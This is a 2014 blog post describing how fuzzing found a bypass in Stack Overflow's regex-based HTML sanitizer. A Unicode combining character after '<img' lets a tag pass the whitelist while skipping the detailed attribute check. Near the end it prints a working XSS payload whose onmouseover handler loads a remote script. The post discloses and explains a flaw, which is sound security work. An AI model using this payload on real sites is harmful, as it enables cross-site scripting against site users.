Hacking stackoverflow.com's HTML sanitizer

Published: 2014-02-19

Finding the code for the sanitizer

While looking around for more things to mess with, I came across a post by Jeff Atwood that mentioned an HTML sanitizer he'd written.

I was able to write a no-nonsense, special purpose HTML sanitizer in about 25 lines of code

Guessing that this might be the code used by Stack Overflow to sanitize the HTML, I figured I'd see if it had any weaknesses.

Here's what it looked like:

private static Regex _tags = new Regex("<[^>]*(>|$)", RegexOptions.Singleline | RegexOptions.ExplicitCapture | RegexOptions.Compiled);
private static Regex _whitelist = new Regex(@"
    ^</?(a|b(lockquote)?|code|em|h(1|2|3)|i|li|ol|p(re)?|s(ub|up|trong|trike)?|ul)>$
    |^<(b|h)r\s?/?>$
    |^<a[^>]+>$
    |^<img[^>]+/?>$",
    RegexOptions.Singleline | RegexOptions.IgnorePatternWhitespace |
    RegexOptions.ExplicitCapture | RegexOptions.Compiled);

/// <summary>
/// sanitize any potentially dangerous tags from the provided raw HTML input using
/// a whitelist based approach, leaving the "safe" HTML tags
/// </summary>
public static string Sanitize(string html)
{

    var tagname = "";
    Match tag;
    var tags = _tags.Matches(html);

    // iterate through all HTML tags in the input
    for (int i = tags.Count-1; i > -1; i--)
    {
        tag = tags[i];
        tagname = tag.Value.ToLower();

        if (!_whitelist.IsMatch(tagname))
        {
            // not on our whitelist? I SAY GOOD DAY TO YOU, SIR. GOOD DAY!
            html = html.Remove(tag.Index, tag.Length);
        }
        else if (tagname.StartsWith("<a"))
        {
            // detailed <a> tag checking
            if (!IsMatch(tagname,
                @"<a\s
                  href=""(\#\d+|(https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)""
                  (\stitle=""[^""]+"")?\s?>"))
            {
                html = html.Remove(tag.Index, tag.Length);
            }
        }
        else if (tagname.StartsWith("<img"))
        {
            // detailed <img> tag checking
            if (!IsMatch(tagname,
                @"<img\s
              src=""https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+""
              (\swidth=""\d{1,3}"")?
              (\sheight=""\d{1,3}"")?
              (\salt=""[^""]*"")?
              (\stitle=""[^""]*"")?
              \s?/?>"))
            {
                html = html.Remove(tag.Index, tag.Length);
            }
        }

    }

    return html;
}

So… what's the problem?

I didn't immediately see anything wrong with Jeff's approach… so I tried to write some code that was smarter than me:

while(true) {
    // Generate a bunch of random HTML by concatenating tags,
    // attributes and random characters
    string testHtml = GenerateTestHtml();

    string sanitizedHtml = Sanitize(testHtml);

    // See if the "sanitized" HTML contains anything that looks
    // dangerous, like a <script> tag, or a tag with an event
    // handler
    if(LooksDangerous(sanitizedHtml)) {
        Output(testHtml, sanitizedHtml);
        break;
    }
}

I ran this, and in a few seconds… I got a hit!

Unfortunately, the input it found was several thousand characters long, and mostly looked like noise… so I had to write a little more code:

for(int i = testHtml.Length - 1; i >= 0; i--) {
    string modified = testHtml.Remove(i, 1);
    // See if the input still results in
    // dangerous looking HTML
    if(LooksDangerous(Sanitize(modified))) {
        testHtml = modified;
    }
}

After running that, the long input had boiled down to this:

<img ̊ onmouseover="">

Interesting. What is the ̊ character doing there?

If we check that input against different parts of the sanitization code, we see that

Regex.isMatch("<img ̊", /^<img[^>]+/?>$/) == true

… but …

"<img ̊".StartsWith("<img") == false

Why is this? Well, ̊ is a combining character, so depending on how you interpret the string, it might look like <img ̊ or <img̊. That discrepency meant that the tag could pass the whitelist, but wasn't eligible for the "detailed <img> checking"

How would you exploit this?

There are undoubtedly lots of bad things you could do, one example would be:

<img ̊ style="display:block;width:100%;height:100%;" onmouseover="$.getScript('http://danlec.com/xss.js')" >

Should have known…

Interestingly, the somewhat famous answer to a question about using RegEx to parse HTML makes heavy use of combining characters.

Maybe bobince was trying to tell us something…

Discuss on Twitter or Hacker News

About the author:

I'm Daniel LeCheminant, a developer at Trello Inc.

You can follow me on Twitter or e-mail me.

Most recent post:

The most popular things I've written: